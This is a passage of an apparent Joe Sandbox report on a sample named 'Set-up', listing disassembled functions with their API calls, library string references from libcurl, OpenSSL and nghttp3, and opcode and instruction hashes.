                                      • Opcode Fuzzy Hash: 7bd4fac319445b9fc66338db1d579d6b7da250b5da431391b84d9a86915dd7e7
                                      • Instruction Fuzzy Hash: 4E11F9B7C0026557EB11B6247C42B7F7668BFA7724F080524FC4993282FB21D95482D3
                                      APIs
                                      • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 005FE209
                                        • Part of subcall function 005F4620: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000004,?,?,00000000,?,00601478,?,?,?), ref: 005F4643
                                      Strings
                                      • Unable to allocate memory for FXP_REMOVE packet, xrefs: 005FE374
                                      • SFTP unlink packet too short, xrefs: 005FE35A
                                      • SFTP Protocol Error, xrefs: 005FE3AA
                                      • Error waiting for FXP STATUS, xrefs: 005FE3BD
                                      • Unable to send FXP_REMOVE command, xrefs: 005FE36B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: _time64memcpy
                                      • String ID: Error waiting for FXP STATUS$SFTP Protocol Error$SFTP unlink packet too short$Unable to allocate memory for FXP_REMOVE packet$Unable to send FXP_REMOVE command
                                      • API String ID: 1622878224-2749593575
                                      • Opcode ID: 661cd611b2f098fdd5eb5ecb8be1b9d38ad447a4c2390a668b09b434f77437d7
                                      • Instruction ID: f1c9ca28d9f81fc22e629e2636aa61b719a92c2a65516d60987bcb4f077b71cc
                                      • Opcode Fuzzy Hash: 661cd611b2f098fdd5eb5ecb8be1b9d38ad447a4c2390a668b09b434f77437d7
                                      • Instruction Fuzzy Hash: DF51C170504309ABDB209F24DC4AB7BBFE5BF41314F144D2DF659972A2E779A8048B62
                                      APIs
                                      • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 0051623A
                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0051624D
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 0051627C
                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00516389
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: strlen$_time64memcpy
                                      • String ID: .$hsts.c
                                      • API String ID: 2198566249-2242870694
                                      • Opcode ID: 3484329eba366c280480d9bc9f4090c2bcfbd7f857289460b819ba70c6775a41
                                      • Instruction ID: 1308e97e0edf29644c1154abf565fd98cfa808018260b5696f2f41fb35689bfc
                                      • Opcode Fuzzy Hash: 3484329eba366c280480d9bc9f4090c2bcfbd7f857289460b819ba70c6775a41
                                      • Instruction Fuzzy Hash: 7441DCB9D043456BFB10BA64AC4ABDB3E98BF58315F080838FD5993183F671D994C693
                                      APIs
                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,0052C0E6,?,00000000,00000000,?,?,?,?,0052AEFD,?), ref: 00548979
                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(host!,?,00000005), ref: 005489EA
                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(ifhost!,?,00000007), ref: 005489FE
                                      • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000021,-000000F9), ref: 00548A53
                                        • Part of subcall function 0052CF80: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,00000000,005530A3,00AFF327,00000001,?,?,?,?,00000000,?,00552436), ref: 0052CFA5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: strncmp$memchrmemcpystrlen
                                      • String ID: cf-socket.c$host!$ifhost!
                                      • API String ID: 365951775-461468357
                                      • Opcode ID: 77f67ef87c25da83a0b99931e4a7872dd0844a54716eab3be17c39c9392b727f
                                      • Instruction ID: e0a18f4265a993a12c19bae5dd9525cf13c9040635dd191a41a4a635c68f8cbe
                                      • Opcode Fuzzy Hash: 77f67ef87c25da83a0b99931e4a7872dd0844a54716eab3be17c39c9392b727f
                                      • Instruction Fuzzy Hash: 6E31E3B1A052161BEF1499399C597BF3E84BB5236CF090539FC85AB3C2EA758C0493A2
                                      APIs
                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,0000002E), ref: 0089447B
                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000042), ref: 008944C4
                                      • WSAStringToAddressW.WS2_32(?,00000002,00000000,?,00000010), ref: 008944E3
                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(0000002E), ref: 00894500
                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0089450B
                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,0000002E), ref: 0089451F
                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00894546
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: strlen$strcmp$AddressByteCharMultiStringWide
                                      • String ID:
                                      • API String ID: 389649969-0
                                      • Opcode ID: 1ced1f8a9e2dc7a32853b20d7d676ef64446850c6e498f0f5265dcf33502b107
                                      • Instruction ID: 65fde37b515fda6256047d51a18b1a3a51bd69b0ba35a40ce3fae0b7367ba2ff
                                      • Opcode Fuzzy Hash: 1ced1f8a9e2dc7a32853b20d7d676ef64446850c6e498f0f5265dcf33502b107
                                      • Instruction Fuzzy Hash: E2313BB190430567FF20B664DC01FBF768CFB91358F0D4228F948D61C1FA75AD458262
                                      APIs
                                      • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,0074F763,?,?,?,?,?), ref: 00752251
                                      • WideCharToMultiByte.KERNEL32 ref: 00752284
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000), ref: 007522BD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$wcslen
                                      • String ID: ERR_CAPI_error$engines/e_capi.c$engines/e_capi_err.c
                                      • API String ID: 1062461220-336193293
                                      • Opcode ID: c02cdfffb8d783a6c57f7516d7ea1e7dfe64928eb3761870db03d9d8d48056f2
                                      • Instruction ID: 3b01703fd18cd9f3a643ab01a0109fb330ef375ec06eb6255ce2bb47000a79b4
                                      • Opcode Fuzzy Hash: c02cdfffb8d783a6c57f7516d7ea1e7dfe64928eb3761870db03d9d8d48056f2
                                      • Instruction Fuzzy Hash: 3621F9A1F043006AF6303B61AC4AF6B3A99EB42715F08413DFD0895193E6FC485A8BA5
                                      APIs
                                      • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 009BC2F9
                                      • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 009BC313
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 009BC3C1
                                        • Part of subcall function 009C0790: calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00000000,009BC32A), ref: 009C07A3
                                        • Part of subcall function 009C0790: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00000000,009BC32A), ref: 009C07C2
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 009BC37B
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 009BC3AB
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 009BC3B3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: free$calloc$malloc
                                      • String ID: 4
                                      • API String ID: 3103867982-4088798008
                                      • Opcode ID: 9efe2e4e9da220ea36655f13678133c5a91bea1987f80b2d892d8a4c0219284d
                                      • Instruction ID: 8b11cb0f74251e4fd90754214fa08a8cb3619771fa184df2863c01383c6cf164
                                      • Opcode Fuzzy Hash: 9efe2e4e9da220ea36655f13678133c5a91bea1987f80b2d892d8a4c0219284d
                                      • Instruction Fuzzy Hash: 1C2138B1404719CACB10AF78858439E7BE4FF05324F45891DE8999B282DB75E904CBD2
                                      APIs
                                      • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(n <= balloc->blklen,nghttp3_balloc.c,00000042,?,00000000,?,005B4D5A,00000000,?,000001F0), ref: 005B8861
                                      • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(((uintptr_t)balloc->buf.last & 0xfu) == 0,nghttp3_balloc.c,00000055,?,000001F0), ref: 005B8873
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: _assert
                                      • String ID: ((uintptr_t)balloc->buf.last & 0xfu) == 0$ZM[$n <= balloc->blklen$nghttp3_balloc.c
                                      • API String ID: 1222420520-2642094360
                                      • Opcode ID: 9ee36e6698268f1a8b0d8d70411e807f2bbe944d08d21e42da85c98310b28b2c
                                      • Instruction ID: 412fc189ed17ab9cb3b7f3bdb4f03624a31d436d5215fc2031cb04c9b2cf92c7
                                      • Opcode Fuzzy Hash: 9ee36e6698268f1a8b0d8d70411e807f2bbe944d08d21e42da85c98310b28b2c
                                      • Instruction Fuzzy Hash: 1911E5B6A44702AFD6009F24EC45AAABBA8FF45721B445A24F814D72D2DB30F850C7E5
                                      APIs
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000005,?,?,?,?,0086DA6D,00000000,00C4A9B4,?,?,?,?,?), ref: 0088299B
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00882A76
                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00020000), ref: 00882A82
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00882AAE
                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00882ABA
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00882B3F
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00882C32
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000005,?,?,?,?,?,?,0086DA6D,00000000,00C4A9B4,?,?,?,?,?), ref: 00882CB2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: memcpy$freemalloc
                                      • String ID:
                                      • API String ID: 3313557100-0
                                      • Opcode ID: 270526b5f8b6274ec66a06248099fa21ded22f0d379f24df784e0f9e933fa776
                                      • Instruction ID: 3c8bd24f9f64439c52eb910b5af720186d71f31b236cfa48d486ede71d717b1c
                                      • Opcode Fuzzy Hash: 270526b5f8b6274ec66a06248099fa21ded22f0d379f24df784e0f9e933fa776
                                      • Instruction Fuzzy Hash: C1D15FB16042199BCB14EF2CC884AAA7BE5FF88314F198629FC59D7391D771DC40CB95
                                      APIs
                                      • setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 009BC435
                                      • _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 009BC445
                                      • setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 009BC467
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: setlocale$_strdup
                                      • String ID:
                                      • API String ID: 134968984-0
                                      • Opcode ID: 921f2d3044aa7842563970f6679ec225842d881172920e85ed190010a4b83b27
                                      • Instruction ID: 09cf542da1e69df4a148f5dd23ab6fd7cb91fd79d572bea9da9a7774e46cf102
                                      • Opcode Fuzzy Hash: 921f2d3044aa7842563970f6679ec225842d881172920e85ed190010a4b83b27
                                      • Instruction Fuzzy Hash: 36917DB1608745CFC710CF29C58179AB7E5FF89328F044A1EE99497351D778EA45CB82
                                      APIs
                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,0066A9CE,000000D2), ref: 006C83A3
                                      • strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0066A9CE), ref: 006C83C6
                                        • Part of subcall function 006C60E0: GetLastError.KERNEL32(006C7CCC,?,00000000,006C7127,006C7CCC,00000000,006ECAB7,00511A70), ref: 006C60E3
                                        • Part of subcall function 006C60E0: SetLastError.KERNEL32(00000000), ref: 006C61A5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: ErrorLast$strcpystrlen
                                      • String ID: crypto/err/err_local.h
                                      • API String ID: 542397150-344804083
                                      • Opcode ID: 999e31b13ee710e73c0fad2b23411fd3a210cf6ce2619e155a30304897423426
                                      • Instruction ID: da3770e455f7dd76a018fd9cacdda3009ca47b6af160b1faf23e7f36373da5f3
                                      • Opcode Fuzzy Hash: 999e31b13ee710e73c0fad2b23411fd3a210cf6ce2619e155a30304897423426
                                      • Instruction Fuzzy Hash: 59815FB1900B01AFE7339F29E889BF2B7D1FB4031CF04491CE595872A5DB79A525CB41
                                      APIs
                                        • Part of subcall function 005173F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,#HttpOnly_,?,0051CA95,00AF6A38,00000467,mprintf.c), ref: 0051741D
                                        • Part of subcall function 005173F0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000008,?,00000001), ref: 00517445
                                        • Part of subcall function 005547D0: fgets.API-MS-WIN-CRT-STDIO-L1-1-0(00000080,00000080,?), ref: 005547FB
                                        • Part of subcall function 005547D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 0055480C
                                        • Part of subcall function 005547D0: feof.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00554837
                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 00516844
                                      • memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,unlimited,0000000A), ref: 00516876
                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 005168FD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
